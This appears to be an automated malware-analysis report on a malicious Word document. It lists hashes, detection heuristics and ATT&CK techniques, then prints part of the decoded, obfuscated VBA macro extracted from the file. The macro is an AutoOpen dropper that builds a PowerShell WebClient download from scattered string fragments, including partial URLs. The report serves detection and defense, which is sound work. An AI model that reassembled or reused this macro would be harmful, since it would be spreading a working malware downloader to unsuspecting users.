Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c9516e9d54883f3…

MALICIOUS

Office (OLE)

191.0 KB Created: 2017-12-09 12:36:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 4f1d846f1e89ad59b4e1f53a9beb23e2 SHA-1: ec7e11b1badefb11ec6ec0fa973914b8096e648b SHA-256: 2c9516e9d54883f318c3972935e2796549760445f930880b35d9c65ed7617247
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function, indicating it's designed to execute arbitrary commands. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a dropper or phishing lure functionality. The heuristic 'SE_PASSWORD_ARCHIVE_LURE' further supports the idea that the document is part of a lure, potentially instructing the user to open a password-protected archive containing the actual malicious payload.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 74792 bytes
SHA-256: e3010ea77726363645e2c922eff56a3b7ecfcb4d5c4a6035c4080b0248acc243
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kXSIJjXw"
Function CHPFIHiQTjTW()
wjwOJEEbiJ = UCase("twmzmFp" + "IpGbrhVLXD" + "VMUTpmsFfvvHrR" + "jsTJHWpSGnzJ" + "XtANYBApY") + UCase("zNtzJcMiOKG" + "dsNvbju" + "jpciilvhj" + "QwIPVvNWfptFk" + "HXQHzdaTuJwHlO")
ZFwiXi = Mid("fTwsuQZwnTP4aZw-objeerp+erpc'+'t Syserp+erpte'+'rp+erpem.Net.e'+'rp+ekV+ekVerpWeberp+erpClierp+erpent;i3wnsaderp+erpasd erp+eekV+ekVrp= nerp+er'+'pewerp+erp-object random;i3erp+jY1zKDkGdq0mwomPrj6mzEi", 15, 163)
zJDXQsIPK = UCase("ritTnGRkj" + "YXLuFMcRP" + "lwzWiXWlwI" + "JsDjnjfsO" + "CBCzkMbdQZ") + UCase("WEdthWlQkf" + "YzOfHLRjzZACj" + "uXwKvHfjrnnapG" + "ubiqOcFl" + "EPMkbzW")
fWraiqpGPqP = UCase("XhfwYtJsN" + "RhFAEVbEcX" + "VnhGPzBw" + "NKwEIIOGMF" + "fDlivUTqoUDIrG") + UCase("tzsIwIu" + "IHjAsvHVsXZfRB" + "KvdLJwKCHzFOQN" + "JpkJcbM" + "auhzKlSbkr")
uSCaYc = UCase("GihzufCbOTR" + "uATtIsPEJj" + "aZbiVfMoPv" + "wnjYGLjHJEDEFd" + "tKCRlRZ") + UCase("HXTzjwBi" + "dzDfNkl" + "UBXQWUV" + "SlBlzJd" + "iYAnNCLHZB")
vjCQiURjQdn = Mid("5GCUU'+'HAR]36))ekV)  -rEpLACEekVzxpekV,7CvawA", 6, 35)
dvjPosaEYjW = UCase("iNSzkvwEcCnhqI" + "NjuIZYwbDQczz" + "oWUWSiprs" + "OiWkRnN" + "rVXijcSZjmPjI") + UCase("wnnjSKXdzWrutu" + "OJPDlIi" + "GqsEtvCbLsSji" + "lVDSOVBrliXYVd" + "dWnTuhp")
CsHfbJdTukH = UCase("FZYjaQOQPCt" + "CzsOKAtDTWjA" + "jwqRqPqUtQftE" + "VjsOUknwpUo" + "GjzIjtX") + UCase("rSXzYmDQJhNUF" + "YUaILQAkIV" + "qIJWljlWNjC" + "tphjXpIH" + "uhIdiaiHqG")
tzCjAsSb = UCase("WhdazNH" + "AIBVQvk" + "OlZkNAdRi" + "TjSuvEFXrzpfaj" + "dcLvDaRL") + UCase("OMSnqVELsDt" + "jGMzPtDkbiK" + "bjXSWiVBVqfjm" + "hVvinWmiu" + "wzohNaAfBY")
sHWBiLv = Mid("rO1CW[ChAR]36 -CrEPlACEekVerpekV,[ChAR]39)) ') -CrePLAcE  ([Char]68+[Char]88+[Char]57),[Char]36-CrePLAcE  'ekV',[Char]39))OOMz1q1", 6, 117)
ioKolSOOGH = UCase("CVidutXA" + "wsqVIjSdjdv" + "NJvbAtDFDPWctJ" + "HDmdRIfWCq" + "VBIEXNLJoMnCt") + UCase("UuYiWNc" + "ILawzirimtkNXB" + "zrJRjVLTBtdwOH" + "jdLXtwdaNhSGZ" + "RfdTwZrMwsdzrY")
bjlMjEUF = UCase("GwloOhrG" + "acKwLhpzvoGtp" + "TYqoouq" + "hNEaXJp" + "oucBwVnpVj") + UCase("DjNSTRwSQXtD" + "CZvztlKf" + "WzLQnDzl" + "TIInQUu" + "IZrZBvrQzWap")
LWXaD = UCase("zcPNpubaCNI" + "tuWPuLptb" + "BlcoMplDTWnE" + "TkSzWzlH" + "izUNJITzp") + UCase("wSbdlBh" + "pztlbpiCibOS" + "paiHfUwfcjVhiF" + "sHjwpLwHZtViiG" + "rjWHIrsWGhi")
mZVwiwtZfi = Mid("FXuziB8riub'-J'+'oiekV+'+'ekVn'+'erperp)( ((erpi3werp+erpfrerp+e'+'rpanc =ekV+ekV neerp+erpYhKhu1", 12, 80)
jjfVJHldh = UCase("jVFvNNHCiuUiXZ" + "DOJaCIckoiVDTA" + "jWvEjmCrDGnii" + "WudWvMlNAnn" + "kQNrKnCr") + UCase("ziTpJAXFT" + "awGSnrhYo" + "TWIQcBl" + "LwzjmRYLKjm" + "NHjXNJiw")
ncGCw = UCase("MQXDsjo" + "XuRdksTJ" + "JpUYwsmKa" + "BAkaPGGkrBpdvp" + "GwRtXQYjIwrOjN") + UCase("ltRnnKnUCX" + "IcHYjuicsvV" + "DjdQbiXrZ" + "TQvLHCmTcO" + "tHwbkQzkEU")
YkwGEMSwlZn = UCase("bfdjBZbSRIfWt" + "TRYMlrnXmdFC" + "OoinCzl" + "YIlrYwHIJzFtt" + "NJozTEDsz") + UCase("wUNdjVdXIvv" + "mUMsfPdf" + "JLAbYzC" + "jmfJHsEliYo" + "ilwSEXTmaZ")
FoJHdGJrok = Mid("6BHdwja1BL7ofAB'V+ekV+erptiekV+ekVerp+erpbeer.it/Cerp+erplerp+erpvRerp+erpA/erp+erpDTXerp+erp.'+'ekV+ekVSperp+ee'+'kV+ekVrplit(erp+erpDerp+erpTX,DTX);ierp+erp3'+'werp+erpkarapasemEQiYnnzpvMD", 16, 163)
NFZBE = UCase("QcNGJtLqffF" + "IrcUmbpZTGuK" + "horNZGUBrA" + "wAtsHmjqn" + "nkHwLIPvIJ") + UCase("DhcEUcGZkjRr" + "WliwSjWD" + "DtEjRNzFGi" + "kuTQnmKdRDlVs" + "aaaSdcnfjiiAkL")
KfjEBAHPXDu = UCase("PUdpIMCLVasbI" + "zicIHBqoK" + "XNiWBjQEH" + "QpiDwYbNTuqJqD" + "sriTXwa") + UCase("LRvijKpK" + "UJwKAYMiZdVQb" + "XiQIplkjA" + "fSlBtvCdkCpjE" + "rSSkwVFtkEXzQB")
DInSZNEv = UCase("BtkNNvscks" + "juCScElaPIMMcL" + "GdwTmDzOUjm" + "iYrnQOzazUGjT" + "aFNojHCmoOiQF") + UCase("jjimqRDCXUwwdk" + "mXRAwdrBjzi" + "wjdJzIFqRmUp" + "kXissii" + "ICrMQHQsi")
jiUzfYPLN = Mid("1HKLd5QB4RtFZN0mvS8uV+'erpekV+ekVwa'+'ekV+ekVerp+erpbc.ToString(
... (truncated)